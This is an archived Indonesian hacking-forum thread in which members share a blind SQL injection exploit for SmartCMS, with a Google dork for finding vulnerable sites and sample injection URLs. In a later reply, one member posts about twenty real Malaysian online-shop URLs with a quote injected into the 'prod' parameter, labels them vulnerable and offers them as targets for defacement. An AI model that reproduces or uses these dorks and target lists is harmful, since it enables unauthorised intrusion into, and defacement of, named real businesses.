Chibi Cyber - Komunitas Cyber Indonesia

Chibi Cyber - Komunitas Cyber Indonesia > Information & Technology > Hacking
 > Exploit > Sql Injection Vulnerability
Full Version: Sql Injection Vulnerability
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

Don Po

07-31-2011, 11:34 AM
# Exploit Title:SmartCMS(index.php)Blind Sql Injection Vulnerability
# Author: Angel Injection
# home Page: [You must be Register or Login to see this link.]
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link:www.smartwebsites.com.cy
# Version: N/A
# Category:: webapps
# Google dork:intext:"powered by SmartCMS" inurl:index.php?pageid=
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Exploit

http://localhost/ind...pageid=1&lang=1'

http://localhost/ind...pageid=1&lang=1[blind here]

demo sites
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1


Enjoy
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq ,Club Hack Team

@ Eastjavahacker Team 2011

Kalau Merasa Newbie Wajib comment Wink

Aufanul.Ichsan

08-09-2011, 10:10 PM
(07-31-2011 11:34 AM)donyprasetya Wrote: [You must be Register or Login to see this link.]# Exploit Title:SmartCMS(index.php)Blind Sql Injection Vulnerability
# Author: Angel Injection
# home Page: [You must be Register or Login to see this link.]
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link:www.smartwebsites.com.cy
# Version: N/A
# Category:: webapps
# Google dork:intext:"powered by SmartCMS" inurl:index.php?pageid=
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Exploit

http://localhost/ind...pageid=1&lang=1'

http://localhost/ind...pageid=1&lang=1[blind here]

demo sites
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1
[You must be Register or Login to see this link.]...pageid=1&lang=1


Enjoy
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq ,Club Hack Team

@ Eastjavahacker Team 2011

Kalau Merasa Newbie Wajib comment Wink
nice inpoh om,ane selalu cari2 exploit2,apalagi buat SQLI thanks thanks!

BaghazzNewbie23

12-19-2011, 08:47 AM
Bagi-Bagi Target buat yg suka Depes MesumMesum
Code:
http://www.printertoner.my/proddetail.php?prod='HPCB250 <== [vuln mas bro]
http://www.puppycom.my/proddetail.php?prod='ID <== [vuln mas bro]
http://www.petsplace.com.my/proddetail.php?prod='AO5 <== [vuln mas bro]
http://www.ink.my/proddetail.php?prod='HL105E <== [vuln mas bro]
http://www.toner2u.my/proddetail.php?prod='MLT-D108S <== [vuln mas bro]
http://www.tonerdirect.my/proddetail.php?prod='ValuePackC525 <== [vuln mas bro]
http://www.avgonline.com.my/proddetail.php?prod='AVGFileServer <== [vuln mas bro]
http://www.buy.my/proddetail.php?prod='PanasonicUG3221 <== [vuln mas bro]
http://www.tonerwholesale.com.my/proddetail.php?prod='Q2613Ax10 <== [vuln mas bro]
http://www.allprinters.my/proddetail.php?prod='HPP1606DN <== [vuln mas bro]
http://www.perfume2u.my/proddetail.php?prod='MRG-HGW <== [vuln mas bro]
http://hinlim.my/proddetail.php?prod='SwedenSet1 <== [vuln mas bro]
http://www.nilaifloralshop.com.my/proddetail.php?prod='fruitsbasket04 <== [vuln mas bro]
http://www.antivirus4u.com.my/proddetail.php?prod='SecuritySuite <== [vuln mas bro]
http://www.handicraft.com.my/proddetail.php?prod='BC021-23 <== [vuln mas bro]
http://www.motoparts.my/proddetail.php?prod='ChainWax <== [vuln mas bro]
http://mvr.com.my/mvrwebsite/proddetail.php?prod='Q7-2G <== [vuln mas bro]
http://jpmarine.com.my/proddetail.php?prod='HBI-CXH1-11P <== [vuln mas bro]
http://www.jpmarine.com.my/proddetail.php?prod='GM-GPSMAP2108 <== [vuln mas bro]
http://www.flamingpear.com.my/store/proddetail.php?prod='AH-NEROENG <== [vuln mas bro]
http://cmsnet.com.my/proddetail.php?prod='VSVA1936A-LED <== [vuln mas bro]

Ternyata di sini sudah ada tutor buat Injection nya
[You must be Register or Login to see this link.]
Dan ada juga cara manual Seperti
[You must be Register or Login to see this link.]
Cmn Segitu dari ane kalau ada yg salah maaf TidurTidurTidur
Chibi Cyber - Komunitas Cyber Indonesia > Information & Technology > Hacking
 > Exploit > Sql Injection Vulnerability
Reference URL's